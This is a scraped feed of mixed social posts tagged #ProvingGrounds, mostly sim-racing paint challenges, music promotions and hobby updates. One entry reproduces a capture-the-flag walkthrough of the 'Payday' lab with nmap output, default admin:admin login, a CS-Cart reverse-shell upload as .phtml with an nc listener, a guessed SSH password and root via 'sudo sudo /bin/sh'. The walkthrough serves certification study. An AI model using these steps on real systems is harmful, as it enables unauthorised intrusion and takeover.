#ProvingGrounds
Ford - Michigan Proving Grounds (b.1957)
Bruce Township, Macomb County Michigan.

Also the site of Mt Twombley, Macomb County's highest point (~1150ft)

#photography #geography #ford #provinggrounds #bruce #macomb #michigan
May 9, 2025 at 12:38 PM
The Daytona 24 is this week and we want to see your paints! Upload them with the hashtag #ProvingGrounds!
January 13, 2026 at 3:16 PM
DETH DEKK DOMINIONS:🆕🎧

MAMORLIS - Proving Grounds 🇺🇸⚛️

3rd album from Portland, OR, U.S. Heavy Metal outfit⚛️

BC➡️mamorlis.bandcamp.com/album/provin...⚛️

#Mamorlis #ProvingGrounds #HeavyMetal #USMetal #DDDMay6 #KMäN
May 7, 2026 at 8:59 AM
Yesterday we posted a new Proving Grounds prompt! Upload your @iracing.com Daytona 500 paint with the hashtag #provinggrounds to our Showroom!

www.tradingpaints.com/provinggrounds
February 10, 2026 at 6:28 PM
Just #ProvingGrounds

No exclaamtion mark. I got too excited.
January 13, 2026 at 8:46 PM
2⃣0⃣2⃣6⃣: THE UPCOMING TERROR ⚔️
➡️May 6th, 2026⬅️

MAMORLIS - Proving Grounds 🇺🇸⚛️

3rd album from Portland, OR, U.S Heavy Metal outfit⚛️

BC➡️mamorlis.bandcamp.com/album/provin...⚛️

#Mamorlis #ProvingGrounds #HeavyMetal #TheUpcomingTerror26 #KMäN
April 23, 2026 at 10:17 AM
Exploring the beautiful vistas of #PlayPaxDei. The setting for builds is truly stunning, no matter if lakeside, valley or high up in the mountains. 🍃

#PaxDei #MMO #ProvingGrounds
November 12, 2024 at 11:29 PM
@iRacing.com Daytona 24 time for the Dirt Ttack Digest team. We are running a Jumpin' Jack Johnson / Peter Britten themed paint scheme on the 963 GTP

Our usual painter (Bobby/Firestorm) was backed up with other work, so I threw this together last night.

@tradingpaints.com #ProvingGrounds
January 16, 2026 at 5:11 PM
My last house in Brighton Township was across the street from the test track at the proving grounds and just down the street from the high bank curve on the track.
Very cool facility❣️🤓❤️
#GeneralMotors #GM #ProvingGrounds #DetroitMuscle
November 30, 2025 at 2:51 PM
In honor of our 15th anniversary and our snazzy new logos, we've put forth another Trading Paints Proving Grounds painting challenge! Paint ANY car with the new TP logos and upload it to the Showroom with the hashtag #ProvingGrounds by February 19th.
February 12, 2025 at 6:17 PM
If you don't follow us on Instagram, shame on you! But you also may not know about a special opportunity to have your work on a real life dirt car! Check out what we're doing with Hunt the Front! #TPxHtF

www.tradingpaints.com/provinggrounds
June 16, 2026 at 2:47 PM
We're doing another Proving Grounds for the iRacing Daytona 500 so if you have a Next Gen NASCAR car can you upload it as a Request to Race to the Showroom with the hashtag #provinggrounds in the description?
February 10, 2026 at 4:35 PM
RE: https://mas.to/@sosaglidingbot/117230469604204286

A good 226km flight yesterday, successfully completing all 3 #provinggrounds tasks in a single flight! Some very unfortunate employment circumstances kept me from getting in much solo flying this summer, let's hope for more good days in 2026 […]
Original post on mastodon.social
mastodon.social
September 8, 2026 at 9:19 PM
We've got 14 submissions for the Painting Challenge so far. Check them out here:
www.tradingpaints.com/ProvingGroun...
#ProvingGrounds
February 14, 2025 at 11:54 PM
ICYMI: We're running another Painting Challenge! Find out more about it on our blog: blog.tradingpaints.com/proving-grou... #ProvingGrounds
February 13, 2025 at 6:08 PM
The next two weeks are about to be crazy...

#ProvingGrounds #FireandLegacy

We will crown a new champion.

Four other championships will be defended.

Anything can happen.
May 21, 2026 at 7:18 PM
Our #NextGenChampionship division is now formed. We are not ranking its members until after #ProvingGrounds but we have aligned its division as we will crown the inaugural champion in a mere few weeks!
May 9, 2026 at 5:29 PM
Did you hear? 👀 Riot is changing the Proving Grounds Best-Of cards at Regionals. I think it’s a solid move to keep the prize pool fresh and exciting, even if it’s tough to say goodbye to some of the current cards. What’s your take?

#Riftbound #ProvingGrounds #Regionals #TCGCommunity #RiotGames
August 4, 2026 at 10:01 PM
Time is running out to submit your paint for the Hunt the Front World 100 Proving Grounds Challenge! We've had a bunch of great entries so far but yours could be the winner! Just paint and upload to the Showroom a dirt late model with the hashtag #ProvingGrounds

www.tradingpaints.com/provinggrounds
June 25, 2026 at 3:57 PM
Less than 24 hours left in the Painting Challenge! Go to www.tradingpaints.com/provinggrounds to vote or upload your own creation! Top 5 vote getters win a digital copy of #nascar25game
October 16, 2025 at 7:54 PM
OSCP: Proving Grounds — Payday
OSCP: Proving Grounds — Payday
OSCP: Proving Grounds — Payday CTF walkthrough on Proving Grounds Practice. “About this lab: Things normally go smooth on payday.” Phase 1 Kicking off enumeration with autorecon that by default will do a full TCP Port scan with Nmap. ──(kali㉿kali)-[~/…/payday/results/192.168.182.39/scans] └─$ cat _full_tcp_nmap.txt # Nmap 7.94SVN scan initiated Sat Jun 21 09:42:35 2025 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/ProvingGrounds/payday/results/192.168.182.39/scans/_full_tcp_nmap.txt -oX /home/kali/ProvingGrounds/payday/results/192.168.182.39/scans/xml/_full_tcp_nmap.xml 192.168.182.39 Nmap scan report for 192.168.182.39 Host is up, received user-set (0.0060s latency). Scanned at 2025-06-21 09:42:35 EDT for 109s Not shown: 65527 closed tcp ports (conn-refused) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 4.6p1 Debian 5build1 (protocol 2.0) | ssh-hostkey: | 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAJedhI7AqO17xYjoo1RT33T4x4g7b+u71OK2CNJW//eoNBEibTyvqAmBDobETDcAZXHMdEMTvINlM7ZjGV4EAhfE57Fkkhae8LvML3Ae0OVsa/l4pWizwGEEkHVujayyHZlwqXnK1ePV9rKnc6VJUYL4yHPMEwhNDme92hxlEWBbAAAAFQCyn5tJyWy2EZXJLQgS/xpiBH36uQAAAIBcUdaW5kLYjbgbalp1Z3cMQuuiG/YhaLxNBMh75vM/SrrsATeqEIUlBNBgDel+fUSPbr2iCQ+I8xrk6CNvcXtugMfJSF78pH42VN5GrLKzNZeoyGzywEhcFKHAqcRMntyEZJ/BiLWRunRcnKznMMa00/d3xRLvTFKUmUjdW1IebAAAAIBRhyvDlRI873HIhNd8GiXY/kZyL+jDQle8ULF1Lk+H+EzKXMSPt0gMv8z2bpSD1XIB565rcFWlO+7q0BZFY+NLJAhMWAWxBE4Ib87uPUqeGvg6D8w6gZur84lpMg7P1KjyihIfY5tMCwfKkkaS418IPzhKtDUvtI0Vr6h3Wv0luA== | 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA) |_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzGacK6NGRpMIVjkA/xYbfKDgeJeQzkJl25og4nQl+FV4ZbvXv6h0vCU+E8SPHKPL/WJAIqmL6hdQaTQiTDmhcKjecWBq9fX1Esb8cvlOPEzphl+wESfJx/lWYvLPBXz0ZdKfy2/O+0an9ua6jl3tDEFzeosHwIF8zDbaBL6/RzBV+0gkzA67OowtcaxoioYYPzsEaOAkAFjlaRMviUA3nzCvffG61KyqmAdwodl+rXyI4KHjQqinPYk5qmj9rO8LcLE/gWVRoRw4va6hbJ2V7e74Tt1HQ4V/FzhG1zrWdkI/qA65RMCw/0270w1PjYkfYl2ENJL6YHHosf4NCkfdbw== 80/tcp open http syn-ack Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: CS-Cart. Powerful PHP shopping cart software |_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6 110/tcp open pop3 syn-ack Dovecot pop3d | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere/emailAddress=root@ubuntu01 | Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere/emailAddress=root@ubuntu01 | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2008-04-25T02:02:48 | Not valid after: 2008-05-25T02:02:48 | MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e | SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829 | -----BEGIN CERTIFICATE----- | MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC | WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET | MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m | ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly | czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1 | MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC | WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET | MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m | ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly | czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1 | MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT | yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf | TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K | eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6 | +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1 | gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS | tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0= |_-----END CERTIFICATE----- |_ssl-date: 2025-06-21T13:43:34+00:00; +7s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_128_WITH_MD5 |_ SSL2_RC2_128_CBC_WITH_MD5 |_pop3-capabilities: UIDL SASL CAPA TOP PIPELINING STLS RESP-CODES 139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: MSHOME) 143/tcp open imap syn-ack Dovecot imapd | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_128_WITH_MD5 |_ SSL2_RC2_128_CBC_WITH_MD5 |_imap-capabilities: IMAP4rev1 Capability completed THREAD=REFERENCES LITERAL+ LOGINDISABLEDA0001 OK LOGIN-REFERRALS IDLE STARTTLS SASL-IR SORT UNSELECT CHILDREN MULTIAPPEND NAMESPACE 445/tcp open netbios-ssn syn-ack Samba smbd 3.0.26a (workgroup: MSHOME) 993/tcp open ssl/imap syn-ack Dovecot imapd | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_128_WITH_MD5 |_ SSL2_RC2_128_CBC_WITH_MD5 | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere/emailAddress=root@ubuntu01 | Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere/emailAddress=root@ubuntu01 | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2008-04-25T02:02:48 | Not valid after: 2008-05-25T02:02:48 | MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e | SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829 | -----BEGIN CERTIFICATE----- | MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC | WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET | MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m | ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly | czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1 | MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC | WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET | MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m | ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly | czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1 | MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT | yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf | TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K | eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6 | +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1 | gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS | tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0= |_-----END CERTIFICATE----- |_imap-capabilities: IMAP4rev1 Capability THREAD=REFERENCES LITERAL+ completed AUTH=PLAINA0001 LOGIN-REFERRALS IDLE OK SASL-IR SORT UNSELECT CHILDREN MULTIAPPEND NAMESPACE 995/tcp open ssl/pop3 syn-ack Dovecot pop3d | sslv2: | SSLv2 supported | ciphers: | SSL2_DES_192_EDE3_CBC_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_128_WITH_MD5 |_ SSL2_RC2_128_CBC_WITH_MD5 | ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere/emailAddress=root@ubuntu01 | Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/organizationalUnitName=Office for Complication of Otherwise Simple Affairs/localityName=Everywhere/emailAddress=root@ubuntu01 | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2008-04-25T02:02:48 | Not valid after: 2008-05-25T02:02:48 | MD5: 90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e | SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829 | -----BEGIN CERTIFICATE----- | MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC | WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET | MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m | ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly | czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1 | MDEwHhcNMDgwNDI1MDIwMjQ4WhcNMDgwNTI1MDIwMjQ4WjCBzTELMAkGA1UEBhMC | WFgxKjAoBgNVBAgTIVRoZXJlIGlzIG5vIHN1Y2ggdGhpbmcgb3V0c2lkZSBVUzET | MBEGA1UEBxMKRXZlcnl3aGVyZTEOMAwGA1UEChMFT0NPU0ExPDA6BgNVBAsTM09m | ZmljZSBmb3IgQ29tcGxpY2F0aW9uIG9mIE90aGVyd2lzZSBTaW1wbGUgQWZmYWly | czERMA8GA1UEAxMIdWJ1bnR1MDExHDAaBgkqhkiG9w0BCQEWDXJvb3RAdWJ1bnR1 | MDEwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMU3nxwLcuZqpwkOS9z97lvT | yR3ByDzjPSVW/FDorKebyGqttioV9xUsO0ws+v8OfNrJbPaJZwZIF8tiRBIbMTJf | TkSpCbmstakQmJFfI3HG9Hgp4AnmJbTPRla1HzYuRArDog/1zZZu/rk9bttIPU3K | eDZWaNQE/5QSszIEv0pXAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEAof/wZAH33zX6 | +sV9LEX3DBhRyyEHYBP1/zEG/gL4MONuNv1+thRYnkpKYc4BbUyO821YdWsUXLM1 | gVXXFxJdzZec+L+ouwXxhLOLCvS9xu+sNsqa+jfFmdHWikDpJ8EPf+tNh/jb2MbS | tXYFup7cGHV+SdI/s5ho9Vdbr68NbW0= |_-----END CERTIFICATE----- |_pop3-capabilities: UIDL SASL(PLAIN) CAPA TOP USER PIPELINING RESP-CODES Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb2-time: Protocol negotiation failed (SMB2) | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Unix (Samba 3.0.26a) | Computer name: payday | NetBIOS computer name: | Domain name: | FQDN: payday |_ System time: 2025-06-21T09:43:04-04:00 |_smb2-security-mode: Couldn't establish a SMBv2 connection. | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 19783/tcp): CLEAN (Couldn't connect) | Check 2 (port 31516/tcp): CLEAN (Couldn't connect) | Check 3 (port 60132/udp): CLEAN (Timeout) | Check 4 (port 20253/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked |_clock-skew: mean: 1h20m06s, deviation: 2h18m33s, median: 6s Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jun 21 09:44:24 2025 -- 1 IP address (1 host up) scanned in 109.70 seconds I have also scanned UDP Ports with the following command: sudo nmap -sU -p 1–1024 -v 192.168.182.39 -oA results_UDP Phase 2 — Port/service enumeration ftp/ssh/web/netbios/smb/rdp/winrm,etc. Enumerate comprehensively Since Port 80 is open I start with web enumeration since this is one of the widest attack surfaces, if not the widest, out of all services. This needs to be done thoroughly and emphatically. First I will physically inspect the web application at http://192.168.182.39 Then I will move onto browsing autorecon’s web enumeration scan results. Physical inspection of the homepage shows a login form , a search bar , and information that tells us this web application is using PHP4 & MySQL . Wappalyzer also tells me some information about the web server which intrigues me — I will definitely do a search online for quick potential exploits for Apache, PHP etc. Phase 3 — Exploit The first thing I do is to try logging in with default credentials. I try admin as a username first with no password and it doesn’t work. Then I try admin:admin and it works . I got lucky this time. These credentials could be re-used later on. I browse the web app and find some Names in the Orders page: Admin Admin Vladimir Intarussamee Autorecon by default does web enumeration to a certain extent and stores those results into the tcp80 sub-directory which I will open below: Autocon’s feroxbuster scan reveals some interesting directories including an /admin directory that has another login form. Logging in through this form reveals an administrator page for the Storefront website, we see more information here than logging in via the homepage. More names are uncovered in the Orders page of customers which could potentially be used as credentials: There is a file upload capability in the web application “Add new Category” page. You can either upload an icon or an image. Can i disguise a malicious script as an image file, and upload it here to get a reverse shell? I do a quick search for exploits based on our Wappalyzer results and I am able to find a potential RCE exploit for the web application software: CS-CART: https://www.exploit-db.com/exploits/48891 # Exploit Title: CS-Cart authenticated RCE # Date: 2020-09-22 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html # Tested at: ver. 1.3.3 # Vulnerability Type: authenticated RCE get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell edit IP && PORT Upload to file manager change the extension from .php to .phtml visit http://[victim]/skins/shell.phtml --> Profit. ...! According to the exploit, a .php shell can be uploaded as a .phtml file via a file manager at the /skins directory of the web application. After some further browsing I find another upload section in the Template Editor . Here, a specific path at /skins is specified so I create my PHP reverse shell and upload the file as a .phtml — knowing I will be able to browse to my reverse shell script at the URL: http://192.168.182.39/skins/php-reverse-shell.phtml Of course, the script needs to be edited to include your listener IP address & Port. My listener is ready: nc -lvnp 1234 I know the file upload is successful because I am able to find the file in the directory listing at /skins: Clicking on the file triggers some buffering on the web application, and I can see my listener has been activated. Brilliant. We have a web shell as www-data: Phase 4 — Initial Foothold Changing directories to /home I find that a local user exists on the system: patrick. That’s a valid username to consider via other services/ports such as SSH (if we can find or guess the password). Logging in as patrick via SSH was troublesome at first because my SSH client was not allowing me to connect at first due to weak encryption protocols offered by the target. I decided to ignore this for some reason and spent 3 hours stuck in a rabbit hole as www-data on a web shell trying to escalate privileges and find any exploits and it just didn’t work which was absolutely infuriating. That’s a lesson learned. I fixed that with the following ssh command. Patrick’s password is : patrick. I couldn’t believe it. Is this how the OSCP exam boxes are going to be – a guessing game of fairly predictable passwords? ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa patrick@192.168.182.39 Phase 6 — Target exploit CVE/misconfiguration Now I can focus on escalating privileges as patrick. Before transferring linpeas.sh I make it a habit to run some manual enumeration right off the bat so I can get a feel of what the user is capable of doing and if I can find any low hanging fruit. I start with sudo -l Patrick is able to run ALL commands on this host as sudo. WHAT? User patrick may run the following commands on this host: (ALL) ALL Phase 7 — Root Since patrick has unlimited sudo privileges, we can go to GTFOBins and exploit the sudo binary to see if we can escalate priviliges. patrick@payday:~$ sudo sudo /bin/sh # whoami root # cd /root # ls capture.cap proof.txt # cat proof.txt 2bc99c043f11d512f25e8f05c90d31eb What I learned The first thing I did when getting webshell access as www-data was to find the local user: patrick. But for some reason I did not use that to my advantage immediately. I tried complicated exploits and did 3 hours of manual enumeration as www-data to try and escalate privileges from the web shell which was a bad move. I remember trying to login as patrick via ssh but it did not work because of the error: Unable to negotiate with 192.168.182.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss I should have tried to fix that error by adjusting my Kali’s SSH client to accommodate for the weak SSH encryption protocols offered by the target at Port 22 and I would have probably, from there, have guessed the password and pwned this machine so much faster. I think it’s safe to say it’s highly unlikely that in the OSCP, you’d be able to escalate from a webshell as www-data — unless it was an unintended path and even then, it wouldn’t be straightforward. It would probably be a nightmare and a much longer path than necessary. Having to guess passwords and usernames seems to be OSCP’s “style”. Web applications can have more than one login form. There could be a front facing login form for customers of a shopping website as seen here, with another login form for administrators in folders such as /admin. OSCP: Proving Grounds — Payday was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
infosecwriteups.com
June 23, 2025 at 6:59 AM
HOUSE_OVERSIGHT_020684.jpg
#epsteinweb #houseoversight020684
February 8, 2026 at 4:23 PM
May 8, 2026 at 4:45 AM
#WIFF emailed me a friendly reminder of my proudest career moment last year, joined by my fellow #ProvingGrounds cast & crew.
August 21, 2025 at 1:10 AM